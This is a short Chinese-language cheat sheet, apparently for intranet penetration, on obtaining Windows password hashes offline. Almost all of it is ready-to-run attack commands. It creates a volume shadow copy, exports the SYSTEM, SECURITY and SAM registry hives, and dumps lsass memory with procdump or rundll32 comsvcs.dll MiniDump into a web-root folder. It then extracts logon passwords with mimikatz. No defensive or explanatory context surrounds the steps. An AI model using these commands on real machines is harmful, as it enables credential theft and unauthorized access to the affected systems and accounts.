内网------离线获取HASH

1、利用卷影拷贝方式获取目标SYSTEM，SECURITY，SAM文件本地离线解密

wmic shadowcopy call create Volume='C:\'

 2、powershell 操作注册表导出文件

powershell reg save hklm\system SYSTEM
powershell reg save hklm\security SECURITY
powershell reg save hklm\sam SAM

 3、利用procdump抓hash

首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

或者使用powershell抓hash

 

tasklist | findstr lsass.exe 查找lsass的pid号

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 592 D:\wwwroot\huodong\lsass.dmp full"

 

将lsass.dmp下载到本地后，然后执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit